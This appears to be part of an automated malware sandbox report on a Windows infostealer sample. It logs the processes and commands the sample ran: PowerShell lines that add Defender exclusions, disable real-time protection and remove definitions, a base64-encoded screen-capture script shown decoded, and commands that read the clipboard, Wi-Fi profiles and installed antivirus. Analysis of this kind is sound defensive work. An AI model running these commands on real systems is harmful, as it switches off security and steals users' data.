                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D154C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00007FF7D154C44C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D154BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,6_2_00007FF7D154BBC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 6_2_00007FF7D154C62C SetUnhandledExceptionFilter,6_2_00007FF7D154C62C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE64D2A4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000273EE64D2A4
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00000273EE647D90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00000273EE647D90
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D1559924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7D1559924
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D154C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FF7D154C44C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D154BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_00007FF7D154BBC0
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FF7D154C62C SetUnhandledExceptionFilter,8_2_00007FF7D154C62C
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB5730D8 IsProcessorFeaturePresent,00007FFE132319A0,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,00007FFE132319A0,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFDFB5730D8
                                  Source: C:\ProgramData\Microsoft\based.exeCode function: 8_2_00007FFDFB692004 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_00007FFDFB692004
                                  Source: C:\Users\user\AppData\Local\Temp\msAgentSavesmonitor\ChainComServermonitor.exeMemory allocated: page read and write | page guard

                                  HIPS / PFW / Operating System Protection Evasion

                                  barindex
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -ForceJump to behavior
                                  Source: C:\ProgramData\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\based.exe'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\?? .scr'
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\Windows\System32\cmd.exeProcess created: Base64 decoded $source = @"using System;using System.Collections.Generic;using System.Drawing;using System.Windows.Forms;public class Screenshot{ public static List<Bitmap> CaptureScreens() { var results = new List<Bitmap>(); var allScreens = Screen.AllScreens; foreach (Screen screen in allScreens) { try { Rectangle bounds = screen.Bounds; using (Bitmap bitmap = new Bitmap(bounds.Width, bounds.Height)) { using (Graphics graphics = Graphics.FromImage(bitmap)) { graphics.CopyFromScreen(new Point(bounds.Left, bounds.Top), Point.Empty, bounds.Size); } results.Add((Bitmap)bitmap.Clone()); } } catch (Exception) { // Handle any exceptions here } } return results; }}"@Add-Type -TypeDefinition $source -ReferencedAssemblies System.Drawing, System.Windows.Forms$screenshots = [Screenshot]::CaptureScreens()for ($i = 0; $i -lt $screenshots.Count; $i++){ $screenshot = $screenshots[$i] $screenshot.Save("./Display ($($i+1)).png") $screenshot.Dispose()}
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtQuerySystemInformation: Indirect: 0x168205D
                                  Source: C:\ProgramData\setup.exeNtQuerySystemInformation: Direct from: 0x7FF690C442AE
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateKey: Indirect: 0x2CF2842
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateKey: Indirect: 0x2CF2875
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateValueKey: Indirect: 0x168293D
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateValueKey: Indirect: 0x168290E
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtDeviceIoControlFile: Indirect: 0x1682B9D
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtDeviceIoControlFile: Indirect: 0x2CF2B9D
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateValueKey: Indirect: 0x2CF290E
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateValueKey: Indirect: 0x2CF293D
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtEnumerateKey: Indirect: 0x1682842
                                  Source: C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.5\dasHost.exeNtQuerySystemInformation: Indirect: 0x2CF205D
                                  Source: C:\ProgramData\setup.exeSection loaded: NULL target: unknown protection: readonly
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
                                  Source: C:\ProgramData\setup.exeThread register set: target process: 7520
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
                                  Source: C:\ProgramData\setup.exeMemory written: C:\Windows\System32\dialer.exe base: 378ADE4010
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Users\user\Desktop\VaTlw2kNGc.exe "C:\Users\user\Desktop\VaTlw2kNGc.exe"Jump to behavior
                                  Source: C:\Users\user\Desktop\VaTlw2kNGc.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exe -pbeznogymJump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\Users\user\AppData\Local\Temp\_MEI69202\Build.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\ProgramData\Microsoft\hacn.exe "C:\ProgramData\Microsoft\hacn.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\ProgramData\Microsoft\based.exe "C:\ProgramData\Microsoft\based.exe" Jump to behavior
                                  Source: C:\ProgramData\Microsoft\hacn.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c start C:\Users\user\AppData\Local\Temp\_MEI26762\s.exe -pbeznogymJump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
                                  Source: C:\ProgramData\Microsoft\based.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
